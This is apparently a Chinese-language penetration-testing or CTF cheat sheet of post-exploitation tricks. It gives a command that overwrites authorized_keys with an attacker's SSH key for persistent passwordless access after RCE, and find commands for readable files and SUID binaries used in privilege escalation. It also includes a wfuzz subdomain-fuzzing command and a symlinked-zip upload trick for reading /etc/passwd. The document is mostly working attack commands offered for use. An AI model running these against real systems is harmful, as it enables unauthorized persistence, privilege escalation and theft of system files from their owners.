ssh公钥免密登录
在找到rce后为了达成免密码登录的效果,可以执行下面的代码使用ssh-keygen生成一个id_rsa、id_rsa.pub,并向目标机器写入id_rsa.pub,最后用所提供的账号密码登录就行
ls -al ~/;mkdir ~/.ssh;echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCxtAMshGdWeqB9WHylfTUUGksOhANWSAOHBQLDTVVjZIxx3yO7xBBrZcG03iImnJ7/Fa2jFNCtES5m+NUdQ8eChxtkMfzgGyTpcg7iEo9KvIT3zTND5mILQyxUffiyBhXI0WXiRX8Y29QnFq0+GA2N/6XBI56NnRsTASoZfqNQRnISftsfpQnnqX6/YJH7biPhAr4/ePJx7zPJTDitEX8zeH87jb1zaZ1bTVXQbmpZ37qF1NQ+/MebS74t4anEsevYW3qJObZyJsvIX+aILSptA9HMFintYgeg0wiII4hdBSEH7mvB9KHfQ1dtMfpBNL6rUJ2BRhjB3Nq84oh3p5IDWjVkZGQ2PH33e2HogF0KEDMWXhvFOa1ZlxOHkL8nlIG3XB8A8yfFe5doLrv38EhZzsLKxQurRjdG6NwzZXjeQSGV0tFey8uEEgc3FwglfThBmZRNaUOYvYmprFBzmVqO1nHMaOPq2UUd/5KwaIdrgIGeWR7ilTkIwwisAmvrokOCC4lErtA7WO0bECHc8ZiAGlIS+X9XiXJm47FiUlcalXCQYPC3Mnt6aFBq+KhfYbmcn+ZA6X0H28VTDrxQqZVUjku4t06DwCMY+oHeRo9305e9Dkx+tkXTYYeTAbL5G1UoedZ7co9MgXNKix2rjB0LoYZp/pEIxJwjAavAPfxwpQ==" > ~/.ssh/authorized_keys
文件查找
当在进行提权且sudo无法使用时,可以使用下面这句文件查找进行相关可读文件的查询。(有时mail文件夹下会有好东西)
find / -type f -user admin -readable 2>/dev/null
搜索高权限指令(提权)
find / -perm -u=s -type f 2>/dev/null
FUZZ域名
积累一个用法和一个字典集——seclists,很全,同时可以用来fuzz域名什么的,下面是例子
wfuzz -c -w /usr/share/seclists/Discovery/DNS/xxxx.txt -u “http://….” -H “Host: FUZZ.xxxx.com” -hl 7
一个很骚的软链接与文件上传结合用法
如果你碰到了一个文件上传入口,但是要求你只能上传一个压缩包,且压缩包里只能有一个pdf文件,你会怎么做?
这个很骚的做法就是将pdf当作你想要读取的文件的软连接,命令如下
ln -s /etc/passwd test.pdf #软链接
zip --symlinks test.zip test.pdf #--symlinks参数是仅封装软链接文件而非源文件